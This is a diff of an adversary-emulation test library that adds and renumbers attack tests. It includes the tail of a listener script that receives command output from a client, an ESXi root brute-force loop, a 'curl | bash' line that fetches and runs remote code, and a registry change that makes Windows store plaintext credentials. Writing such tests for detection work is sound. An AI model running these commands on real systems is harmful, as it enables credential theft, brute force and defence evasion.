+                # Receive output from the client
+                output = client_socket.recv(65536)
+
+                # Print output (decode if it's command data)
+                try:
+                    print("Output from client:", output.decode())
+                except UnicodeDecodeError:
+                    print("Output from client:", output)
+
+            # Close the connection
+            client_socket.close()
+        except ConnectionAbortedError:
+            print("Connection aborted by the client.")
+            continue
+        except ConnectionResetError:
+            print("Connection reset by the client.")
+            continue
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Telnet server")
+    parser.add_argument("host", help="Host IP address")
+    parser.add_argument("--port", type=int, default=23, help="Port number (default: 23)")
+    args = parser.parse_args()
+
+    main(args.host, args.port)
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md
index 672281b6..c66d2dab 100644
--- a/atomics/T1110.001/T1110.001.md
+++ b/atomics/T1110.001/T1110.001.md
@@ -40,6 +40,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd)
 
+- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi---brute-force-until-account-lockout)
+
 
 <br/>
 
@@ -430,4 +432,56 @@ pkg update && pkg install -y sudo curl bash
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - ESXi - Brute Force Until Account Lockout
+An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$lockout_threshold = [int]"#{lockout_threshold}"
+for ($var = 1; $var -le $lockout_threshold; $var++) {
+  #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+  }
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The plink executable must be found in the ExternalPayloads folder.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 80a84566..3ec16bf7 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -263,4 +263,40 @@ atomic_tests:
       curl -s #{remote_url} |bash
     cleanup_command: |
       rmuser -y art
-
+- name: ESXi - Brute Force Until Account Lockout
+  auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+  description: |
+    An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+    In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    lockout_threshold:
+      description: Specify the account lockout threshold configured on the ESXI management server
+      type: string
+      default: "5"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      $lockout_threshold = [int]"#{lockout_threshold}"
+      for ($var = 1; $var -le $lockout_threshold; $var++) {
+        #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+        }
+    name: powershell
+    elevation_required: false
\ No newline at end of file
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index efe38f2a..ddfad878 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -16,135 +16,137 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
 
-- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
+- [Atomic Test #4 - Use Powershell to Modify registry to store logon credentials](#atomic-test-4---use-powershell-to-modify-registry-to-store-logon-credentials)
 
-- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
+- [Atomic Test #5 - Add domain to Trusted sites Zone](#atomic-test-5---add-domain-to-trusted-sites-zone)
 
-- [Atomic Test #6 - Change Powershell Execution Policy to Bypass](#atomic-test-6---change-powershell-execution-policy-to-bypass)
+- [Atomic Test #6 - Javascript in registry](#atomic-test-6---javascript-in-registry)
 
-- [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)
+- [Atomic Test #7 - Change Powershell Execution Policy to Bypass](#atomic-test-7---change-powershell-execution-policy-to-bypass)
 
-- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-8---blackbyte-ransomware-registry-changes---cmd)
 
-- [Atomic Test #9 - Disable Windows Registry Tool](#atomic-test-9---disable-windows-registry-tool)
+- [Atomic Test #9 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-9---blackbyte-ransomware-registry-changes---powershell)
 
-- [Atomic Test #10 - Disable Windows CMD application](#atomic-test-10---disable-windows-cmd-application)
+- [Atomic Test #10 - Disable Windows Registry Tool](#atomic-test-10---disable-windows-registry-tool)
 
-- [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application)
+- [Atomic Test #11 - Disable Windows CMD application](#atomic-test-11---disable-windows-cmd-application)
 
-- [Atomic Test #12 - Disable Windows Notification Center](#atomic-test-12---disable-windows-notification-center)
+- [Atomic Test #12 - Disable Windows Task Manager application](#atomic-test-12---disable-windows-task-manager-application)
 
-- [Atomic Test #13 - Disable Windows Shutdown Button](#atomic-test-13---disable-windows-shutdown-button)
+- [Atomic Test #13 - Disable Windows Notification Center](#atomic-test-13---disable-windows-notification-center)
 
-- [Atomic Test #14 - Disable Windows LogOff Button](#atomic-test-14---disable-windows-logoff-button)
+- [Atomic Test #14 - Disable Windows Shutdown Button](#atomic-test-14---disable-windows-shutdown-button)
 
-- [Atomic Test #15 - Disable Windows Change Password Feature](#atomic-test-15---disable-windows-change-password-feature)
+- [Atomic Test #15 - Disable Windows LogOff Button](#atomic-test-15---disable-windows-logoff-button)
 
-- [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature)
+- [Atomic Test #16 - Disable Windows Change Password Feature](#atomic-test-16---disable-windows-change-password-feature)
 
-- [Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-17---activate-windows-nodesktop-group-policy-feature)
+- [Atomic Test #17 - Disable Windows Lock Workstation Feature](#atomic-test-17---disable-windows-lock-workstation-feature)
 
-- [Atomic Test #18 - Activate Windows NoRun Group Policy Feature](#atomic-test-18---activate-windows-norun-group-policy-feature)
+- [Atomic Test #18 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-18---activate-windows-nodesktop-group-policy-feature)
 
-- [Atomic Test #19 - Activate Windows NoFind Group Policy Feature](#atomic-test-19---activate-windows-nofind-group-policy-feature)
+- [Atomic Test #19 - Activate Windows NoRun Group Policy Feature](#atomic-test-19---activate-windows-norun-group-policy-feature)
 
-- [Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-20---activate-windows-nocontrolpanel-group-policy-feature)
+- [Atomic Test #20 - Activate Windows NoFind Group Policy Feature](#atomic-test-20---activate-windows-nofind-group-policy-feature)
 
-- [Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-21---activate-windows-nofilemenu-group-policy-feature)
+- [Atomic Test #21 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-21---activate-windows-nocontrolpanel-group-policy-feature)
 
-- [Atomic Test #22 - Activate Windows NoClose Group Policy Feature](#atomic-test-22---activate-windows-noclose-group-policy-feature)
+- [Atomic Test #22 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-22---activate-windows-nofilemenu-group-policy-feature)
 
-- [Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-23---activate-windows-nosettaskbar-group-policy-feature)
+- [Atomic Test #23 - Activate Windows NoClose Group Policy Feature](#atomic-test-23---activate-windows-noclose-group-policy-feature)
 
-- [Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-24---activate-windows-notraycontextmenu-group-policy-feature)
+- [Atomic Test #24 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-24---activate-windows-nosettaskbar-group-policy-feature)
 
-- [Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-25---activate-windows-nopropertiesmydocuments-group-policy-feature)
+- [Atomic Test #25 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-25---activate-windows-notraycontextmenu-group-policy-feature)
 
-- [Atomic Test #26 - Hide Windows Clock Group Policy Feature](#atomic-test-26---hide-windows-clock-group-policy-feature)
+- [Atomic Test #26 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-26---activate-windows-nopropertiesmydocuments-group-policy-feature)
 
-- [Atomic Test #27 - Windows HideSCAHealth Group Policy Feature](#atomic-test-27---windows-hidescahealth-group-policy-feature)
+- [Atomic Test #27 - Hide Windows Clock Group Policy Feature](#atomic-test-27---hide-windows-clock-group-policy-feature)
 
-- [Atomic Test #28 - Windows HideSCANetwork Group Policy Feature](#atomic-test-28---windows-hidescanetwork-group-policy-feature)
+- [Atomic Test #28 - Windows HideSCAHealth Group Policy Feature](#atomic-test-28---windows-hidescahealth-group-policy-feature)
 
-- [Atomic Test #29 - Windows HideSCAPower Group Policy Feature](#atomic-test-29---windows-hidescapower-group-policy-feature)
+- [Atomic Test #29 - Windows HideSCANetwork Group Policy Feature](#atomic-test-29---windows-hidescanetwork-group-policy-feature)
 
-- [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature)
+- [Atomic Test #30 - Windows HideSCAPower Group Policy Feature](#atomic-test-30---windows-hidescapower-group-policy-feature)
 
-- [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry)
+- [Atomic Test #31 - Windows HideSCAVolume Group Policy Feature](#atomic-test-31---windows-hidescavolume-group-policy-feature)
 
-- [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled)
+- [Atomic Test #32 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-32---windows-modify-show-compress-color-and-info-tip-registry)
 
-- [Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network](#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network)
+- [Atomic Test #33 - Windows Powershell Logging Disabled](#atomic-test-33---windows-powershell-logging-disabled)
 
-- [Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network](#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network)
+- [Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode without Network](#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-without-network)
 
-- [Atomic Test #35 - Disable Windows Toast Notifications](#atomic-test-35---disable-windows-toast-notifications)
+- [Atomic Test #35 - Windows Add Registry Value to Load Service in Safe Mode with Network](#atomic-test-35---windows-add-registry-value-to-load-service-in-safe-mode-with-network)
 
-- [Atomic Test #36 - Disable Windows Security Center Notifications](#atomic-test-36---disable-windows-security-center-notifications)
+- [Atomic Test #36 - Disable Windows Toast Notifications](#atomic-test-36---disable-windows-toast-notifications)
 
-- [Atomic Test #37 - Suppress Win Defender Notifications](#atomic-test-37---suppress-win-defender-notifications)
+- [Atomic Test #37 - Disable Windows Security Center Notifications](#atomic-test-37---disable-windows-security-center-notifications)
 
-- [Atomic Test #38 - Allow RDP Remote Assistance Feature](#atomic-test-38---allow-rdp-remote-assistance-feature)
+- [Atomic Test #38 - Suppress Win Defender Notifications](#atomic-test-38---suppress-win-defender-notifications)
 
-- [Atomic Test #39 - NetWire RAT Registry Key Creation](#atomic-test-39---netwire-rat-registry-key-creation)
+- [Atomic Test #39 - Allow RDP Remote Assistance Feature](#atomic-test-39---allow-rdp-remote-assistance-feature)
 
-- [Atomic Test #40 - Ursnif Malware Registry Key Creation](#atomic-test-40---ursnif-malware-registry-key-creation)
+- [Atomic Test #40 - NetWire RAT Registry Key Creation](#atomic-test-40---netwire-rat-registry-key-creation)
 
-- [Atomic Test #41 - Terminal Server Client Connection History Cleared](#atomic-test-41---terminal-server-client-connection-history-cleared)
+- [Atomic Test #41 - Ursnif Malware Registry Key Creation](#atomic-test-41---ursnif-malware-registry-key-creation)
 
-- [Atomic Test #42 - Disable Windows Error Reporting Settings](#atomic-test-42---disable-windows-error-reporting-settings)
+- [Atomic Test #42 - Terminal Server Client Connection History Cleared](#atomic-test-42---terminal-server-client-connection-history-cleared)
 
-- [Atomic Test #43 - DisallowRun Execution Of Certain Applications](#atomic-test-43---disallowrun-execution-of-certain-applications)
+- [Atomic Test #43 - Disable Windows Error Reporting Settings](#atomic-test-43---disable-windows-error-reporting-settings)
 
-- [Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-44---enabling-restricted-admin-mode-via-command_prompt)
+- [Atomic Test #44 - DisallowRun Execution Of Certain Applications](#atomic-test-44---disallowrun-execution-of-certain-applications)
 
-- [Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions](#atomic-test-45---mimic-ransomware---enable-multiple-user-sessions)
+- [Atomic Test #45 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-45---enabling-restricted-admin-mode-via-command_prompt)
 
-- [Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User](#atomic-test-46---mimic-ransomware---allow-multiple-rdp-sessions-per-user)
+- [Atomic Test #46 - Mimic Ransomware - Enable Multiple User Sessions](#atomic-test-46---mimic-ransomware---enable-multiple-user-sessions)
 
-- [Atomic Test #47 - Event Viewer Registry Modification - Redirection URL](#atomic-test-47---event-viewer-registry-modification---redirection-url)
+- [Atomic Test #47 - Mimic Ransomware - Allow Multiple RDP Sessions per User](#atomic-test-47---mimic-ransomware---allow-multiple-rdp-sessions-per-user)
 
-- [Atomic Test #48 - Event Viewer Registry Modification - Redirection Program](#atomic-test-48---event-viewer-registry-modification---redirection-program)
+- [Atomic Test #48 - Event Viewer Registry Modification - Redirection URL](#atomic-test-48---event-viewer-registry-modification---redirection-url)
 
-- [Atomic Test #49 - Enabling Remote Desktop Protocol via Remote Registry](#atomic-test-49---enabling-remote-desktop-protocol-via-remote-registry)
+- [Atomic Test #49 - Event Viewer Registry Modification - Redirection Program](#atomic-test-49---event-viewer-registry-modification---redirection-program)
 
-- [Atomic Test #50 - Disable Win Defender Notification](#atomic-test-50---disable-win-defender-notification)
+- [Atomic Test #50 - Enabling Remote Desktop Protocol via Remote Registry](#atomic-test-50---enabling-remote-desktop-protocol-via-remote-registry)
 
-- [Atomic Test #51 - Disable Windows OS Auto Update](#atomic-test-51---disable-windows-os-auto-update)
+- [Atomic Test #51 - Disable Win Defender Notification](#atomic-test-51---disable-win-defender-notification)
 
-- [Atomic Test #52 - Disable Windows Auto Reboot for current logon user](#atomic-test-52---disable-windows-auto-reboot-for-current-logon-user)
+- [Atomic Test #52 - Disable Windows OS Auto Update](#atomic-test-52---disable-windows-os-auto-update)
 
-- [Atomic Test #53 - Windows Auto Update Option to Notify before download](#atomic-test-53---windows-auto-update-option-to-notify-before-download)
+- [Atomic Test #53 - Disable Windows Auto Reboot for current logon user](#atomic-test-53---disable-windows-auto-reboot-for-current-logon-user)
 
-- [Atomic Test #54 - Do Not Connect To Win Update](#atomic-test-54---do-not-connect-to-win-update)
+- [Atomic Test #54 - Windows Auto Update Option to Notify before download](#atomic-test-54---windows-auto-update-option-to-notify-before-download)
 
-- [Atomic Test #55 - Tamper Win Defender Protection](#atomic-test-55---tamper-win-defender-protection)
+- [Atomic Test #55 - Do Not Connect To Win Update](#atomic-test-55---do-not-connect-to-win-update)
 
-- [Atomic Test #56 - Snake Malware Registry Blob](#atomic-test-56---snake-malware-registry-blob)
+- [Atomic Test #56 - Tamper Win Defender Protection](#atomic-test-56---tamper-win-defender-protection)
 
-- [Atomic Test #57 - Allow Simultaneous Download Registry](#atomic-test-57---allow-simultaneous-download-registry)
+- [Atomic Test #57 - Snake Malware Registry Blob](#atomic-test-57---snake-malware-registry-blob)
 
-- [Atomic Test #58 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd](#atomic-test-58---modify-internet-zone-protocol-defaults-in-current-user-registry---cmd)
+- [Atomic Test #58 - Allow Simultaneous Download Registry](#atomic-test-58---allow-simultaneous-download-registry)
 
-- [Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell](#atomic-test-59---modify-internet-zone-protocol-defaults-in-current-user-registry---powershell)
+- [Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd](#atomic-test-59---modify-internet-zone-protocol-defaults-in-current-user-registry---cmd)
 
-- [Atomic Test #60 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.](#atomic-test-60---activities-to-disable-secondary-authentication-detected-by-modified-registry-value)
+- [Atomic Test #60 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell](#atomic-test-60---modify-internet-zone-protocol-defaults-in-current-user-registry---powershell)
 
-- [Atomic Test #61 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.](#atomic-test-61---activities-to-disable-microsoft-fido-aka-fast-identity-online-authentication-detected-by-modified-registry-value)
+- [Atomic Test #61 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.](#atomic-test-61---activities-to-disable-secondary-authentication-detected-by-modified-registry-value)
 
-- [Atomic Test #62 - Scarab Ransomware Defense Evasion Activities](#atomic-test-62---scarab-ransomware-defense-evasion-activities)
+- [Atomic Test #62 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.](#atomic-test-62---activities-to-disable-microsoft-fido-aka-fast-identity-online-authentication-detected-by-modified-registry-value)
 
-- [Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry)
+- [Atomic Test #63 - Scarab Ransomware Defense Evasion Activities](#atomic-test-63---scarab-ransomware-defense-evasion-activities)
 
-- [Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-64---disable-remote-desktop-security-settings-through-registry)
+- [Atomic Test #64 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-64---disable-remote-desktop-anti-alias-setting-through-registry)
 
-- [Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-65---disabling-showui-settings-of-windows-error-reporting-wer)
+- [Atomic Test #65 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-65---disable-remote-desktop-security-settings-through-registry)
 
-- [Atomic Test #66 - Enable Proxy Settings](#atomic-test-66---enable-proxy-settings)
+- [Atomic Test #66 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-66---disabling-showui-settings-of-windows-error-reporting-wer)
 
-- [Atomic Test #67 - Set-Up Proxy Server](#atomic-test-67---set-up-proxy-server)
+- [Atomic Test #67 - Enable Proxy Settings](#atomic-test-67---enable-proxy-settings)
 
-- [Atomic Test #68 - RDP Authentication Level Override](#atomic-test-68---rdp-authentication-level-override)
+- [Atomic Test #68 - Set-Up Proxy Server](#atomic-test-68---set-up-proxy-server)
+
+- [Atomic Test #69 - RDP Authentication Level Override](#atomic-test-69---rdp-authentication-level-override)
 
 
 <br/>
@@ -255,7 +257,40 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
 <br/>
 <br/>
 
-## Atomic Test #4 - Add domain to Trusted sites Zone
+## Atomic Test #4 - Use Powershell to Modify registry to store logon credentials
+Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 68254a85-aa42-4312-a695-38b7276307f8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '1' -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '0' -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Add domain to Trusted sites Zone
 Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
 Upon execution, details of the new registry entries will be displayed.
 Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
@@ -302,7 +337,7 @@ Remove-item  $key -Recurse -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #5 - Javascript in registry
+## Atomic Test #6 - Javascript in registry
 Upon execution, a javascript block will be placed in the registry for persistence.
 Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
 
@@ -335,7 +370,7 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
 <br/>
 <br/>
 
-## Atomic Test #6 - Change Powershell Execution Policy to Bypass
+## Atomic Test #7 - Change Powershell Execution Policy to Bypass
 Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
 They can either specify it during the execution of the powershell script or change the registry value for it.
 
@@ -373,7 +408,7 @@ try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope Lo
 <br/>
 <br/>
 
-## Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - CMD
 This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
 The steps are as follows:
 <ol>
@@ -416,7 +451,7 @@ reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled
 <br/>
 <br/>
 
-## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+## Atomic Test #9 - BlackByte Ransomware Registry Changes - Powershell
 This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
 The steps are as follows:
 <ol>
@@ -459,7 +494,7 @@ Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name Lo
 <br/>
 <br/>
 
-## Atomic Test #9 - Disable Windows Registry Tool
+## Atomic Test #10 - Disable Windows Registry Tool
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
 See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
 
@@ -492,7 +527,7 @@ powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVe
 <br/>
 <br/>
 
-## Atomic Test #10 - Disable Windows CMD application
+## Atomic Test #11 - Disable Windows CMD application
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
 See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
 
@@ -525,7 +560,7 @@ Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Na
 <br/>
 <br/>
 
-## Atomic Test #11 - Disable Windows Task Manager application
+## Atomic Test #12 - Disable Windows Task Manager application
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
 See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
 
@@ -558,7 +593,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #12 - Disable Windows Notification Center
+## Atomic Test #13 - Disable Windows Notification Center
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
 See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
 
@@ -591,7 +626,7 @@ reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v Dis
 <br/>
 <br/>
 
-## Atomic Test #13 - Disable Windows Shutdown Button
+## Atomic Test #14 - Disable Windows Shutdown Button
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
 See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
 
@@ -624,7 +659,7 @@ reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policie
 <br/>
 <br/>
 
-## Atomic Test #14 - Disable Windows LogOff Button
+## Atomic Test #15 - Disable Windows LogOff Button
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
 See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
 
@@ -659,7 +694,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #15 - Disable Windows Change Password Feature
+## Atomic Test #16 - Disable Windows Change Password Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
 See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
 
@@ -692,7 +727,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #16 - Disable Windows Lock Workstation Feature
+## Atomic Test #17 - Disable Windows Lock Workstation Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
 See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
 
@@ -725,7 +760,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature
+## Atomic Test #18 - Activate Windows NoDesktop Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -759,7 +794,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #18 - Activate Windows NoRun Group Policy Feature
+## Atomic Test #19 - Activate Windows NoRun Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -793,7 +828,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #19 - Activate Windows NoFind Group Policy Feature
+## Atomic Test #20 - Activate Windows NoFind Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
 Take note that some Group Policy changes might require a restart to take effect.
